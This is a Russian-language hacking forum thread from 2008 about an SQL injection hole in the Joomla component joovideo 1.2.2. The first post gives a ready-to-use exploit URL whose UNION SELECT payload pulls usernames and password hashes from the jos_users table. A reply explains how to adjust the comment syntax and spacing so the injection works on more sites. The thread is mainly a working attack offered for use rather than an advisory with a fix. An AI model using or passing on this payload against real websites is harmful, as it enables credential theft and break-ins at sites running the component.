Joomla Component joovideo 1.2.2

Тема в разделе ".:: Уязвимости", создана пользователем d1mka, 21 мар 2008.

Статус темы:
Закрыта.
  1. d1mka

    d1mka Постоялец

    Регистр.:
    20 мар 2007
    Сообщения:
    92
    Симпатии:
    23
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/* */select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2, concat(username,0x3a,password)/**/from/**/jos_users/*
     
  2. Lucid_Mind

    Lucid_Mind Постоялец

    Регистр.:
    18 янв 2009
    Сообщения:
    72
    Симпатии:
    34
    Только пробелы нужно поставить между union и select и from и jos_users, ещё некоторые сайты не понимают начала комментариев с /*, если не удаётся - нужно попробовать с "--".
     
Статус темы:
Закрыта.